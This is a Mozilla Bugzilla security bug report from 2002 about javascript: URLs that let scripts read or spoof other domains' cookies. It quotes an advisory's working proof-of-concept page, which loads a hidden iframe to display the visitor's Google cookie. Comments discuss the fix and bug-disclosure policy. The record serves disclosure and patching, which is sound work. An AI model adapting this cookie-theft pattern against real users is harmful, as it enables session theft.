Closed Bug 159152 Opened 23 years ago Closed 23 years ago

Javascript can steal cookies from other domains

Categories

(Core :: Security, defect)

defect
Not set
critical

Tracking

VERIFIED DUPLICATE of bug 152725

People

(Reporter: jwbaker, Assigned: security-bugs)

Details

Seen on bugtraq -- "Mozilla cookie stealing - Sandblad advisory #9" -- but not found yet on Bugzilla, so here goes:

DESCRIPTION:
============
Mozilla allows script in the javascript protocol to set and read cookies. For javascript URLs the host and path for the cookie is pulled out as:

    "javascript:[host][path]"

Cookie security is based only on restricting access to correct matching host and path. By carefully crafting a malicious javascript URL opened in a new frame/iframe/window, it is possible to access and alter cookies from other domains.

DETAILS:
========
The easiest way to exploit the vulnerability is to simply create a javascript URL in a javascript function as:

    javascript://[host]/[path]\n[code to read cookie]

The // will make sure host and path don't generate any javascript errors.

EXPLOIT:
========
Instructions: Put the exploit in a html document on a remote server and load it with your Mozilla browser to activate the exploit.

-------------------------- CUT HERE ----------------------------
<pre>
Title:   Mozilla cookie stealing/spoofing
Date:    [2002-07-24]
Impact:  Steal/spoof arbitrary cookie             _ _
         using javascript: URLs               o' \,=./ `o
Author:  Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

This demo will display your google cookie (must exist).
</pre>
<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
  f.location = "javascript://www.google.com/\n"+
               "'<body onload=alert(document.cookie)>'";
}
</script>
-------------------------- CUT HERE ----------------------------
Exploit verified using Mozilla/5.0 Galeon/1.2.5 (X11; Linux i686; U;) Gecko/20020610 Debian/1.2.5-1
I think the javascript code should run under the security domain of wherever it came from, right? That is javascript code from www.google.com should run under www.google.com for security purposes, not javascript:whatever().
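The policy question raised in the two comments above, as an added illustration (not Mozilla code, and not from the advisory): a cookie principal derived from the text of a `javascript:` URL resolves to whatever host the URL author wrote, while a principal inherited from the initiating document does not. The cookie jar, `attacker.example` host name and function names are constructed for this example.

```javascript
// Constructed cookie jar: host -> cookie string (sample values, not real cookies).
const cookieJar = {
  "www.google.com": "PREF=ID=constructed",
  "attacker.example": "session=constructed",
};

// The flawed scheme the advisory describes: pull "[host][path]" straight out
// of the URL text, regardless of scheme. "javascript://www.google.com/\n..."
// therefore yields host "www.google.com".
function urlHostNaive(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/\s]*)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Hardened rule (the point made in the comment above): a javascript: URL
// carries no authority of its own, so the script in it runs with the
// principal of the document that triggered the navigation. Only an http(s)
// navigation establishes a new host-based principal; other schemes get none.
function principalFor(url, initiatorHost) {
  const scheme = (url.split(":")[0] || "").toLowerCase();
  if (scheme === "javascript") return initiatorHost;
  if (scheme === "http" || scheme === "https") return urlHostNaive(url);
  return null;
}

// Cookies readable by script running under principal `host`.
function visibleCookies(host) {
  return host && Object.prototype.hasOwnProperty.call(cookieJar, host)
    ? cookieJar[host]
    : "";
}

// The URL shape from the advisory, loaded from a page on attacker.example.
const demoUrl = "javascript://www.google.com/\n'<body onload=alert(document.cookie)>'";

// Flawed policy: host parsed from the URL text -> "www.google.com"
const naiveHost = urlHostNaive(demoUrl);
// Fixed policy: principal inherited from the initiator -> "attacker.example"
const fixedHost = principalFor(demoUrl, "attacker.example");

console.log("naive:", naiveHost, "->", visibleCookies(naiveHost));
console.log("fixed:", fixedHost, "->", visibleCookies(fixedHost));
```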
If you read the full advisory: http://online.securityfocus.com/archive/1/284012/2002-07-21/2002-07-27/0 it states that mozilla 1.1b has this problem fixed. As a security bug you can't search for it, so no wonder that it didn't come up in a query, although you can bet that there is one.
That's great, but the fix should be in the 1.0 branch as well.
I bet the fix will be also in 1.0.1 if we release it...
duplicate of bug 152725, but if I close this one we'll just collect more until that one's opened up.
I have to ask... since there is a public announcement on bugtraq with an exploit and since this has been reported on securityfocus, what's the point of keeping the bug closed?
Whiteboard: FIXED BY BUG 152725
*** This bug has been marked as a duplicate of 152725 ***
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → DUPLICATE
Verified
Status: RESOLVED → VERIFIED